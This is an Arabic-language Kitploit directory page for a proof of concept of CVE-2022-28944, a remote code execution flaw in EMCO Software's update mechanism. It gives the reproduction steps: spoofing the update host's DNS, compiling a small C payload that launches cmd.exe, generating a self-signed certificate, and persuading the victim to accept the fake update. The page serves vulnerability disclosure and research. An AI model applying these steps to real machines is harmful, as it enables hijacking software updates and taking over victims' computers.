Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2022-28944 — إثبات مفهوم لاستغلال تنفيذ الأوامر عن بُعد دون مصادقة في منتجات برمجيات EMCO عبر تزوير DNS وحقن تحديثات خبيثة. | Kitploit
أدوات/GitHubGitHub/gar-re/cve-2022-28944
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةأداة الوصول عن بعدتطوير الحمولات
GitHubgar-re/cve-2022-28944

cve-2022-28944

إثبات مفهوم لاستغلال تنفيذ الأوامر عن بُعد دون مصادقة في منتجات برمجيات EMCO عبر تزوير DNS وحقن تحديثات خبيثة.

عرض المستودع
413منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-28944

ثغرة تنفيذ تعليمات برمجية عن بُعد في تحديث غير مُصادق عليه لمنتجات متعددة من EMCO Software.

الاستخدام: python3 cve-2022-28944_poc.py

التفاصيل في التقرير على gerr.re.

خطوات إعادة الإنتاج

  1. ثبّت أحد المنتجات المتأثرة من EMCO Software؛
  2. اضبط انتحال storage.emcosoftware.com ليشير إلى عنوان IP الخاص بالمهاجم؛
    • لإثبات المفهوم، عدّل c:\windows\system32\drivers\etc\hosts على الجهاز المستهدف.
      • ملاحظة: قد يستخدم المهاجمون على سبيل المثال:
        • أجهزة توجيه/محوّلات/خوادم DNS مُهيأة بشكل سيئ،
        • انتحال DNS / تسميم ذاكرة التخزين المؤقت،
        • انتحال ARP / تسميم ذاكرة التخزين المؤقت.
  3. قم بتجميع proof.c على جهاز المهاجم، على سبيل المثال باستخدام i686-w64-mingw32-gcc proof.c -o proof.exe؛
root@kitploit:~
#include <windows.h>
int main(int argc, char const *argv[]){	
	WinExec("cmd.exe",1);
	return TRUE;
}
  1. أنشئ شهادات موقّعة ذاتيًا؛
    • على سبيل المثال باستخدام openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com"
  2. شغّل سكربت إثبات المفهوم؛
  3. شغّل المنتج المتأثر من EMCO Software ثم إما
    • انتظر يومًا لتشغيل التحديث تلقائيًا، أو
    • شغّل التحديث يدويًا من خلال قائمة التطبيق؛
  4. اقبل التحديث في معالج التحديث.
    • سيستخدم المهاجمون وصف تحديث مقنعًا لإقناع الهدف بقبول التحديث.
تنزيل الأداة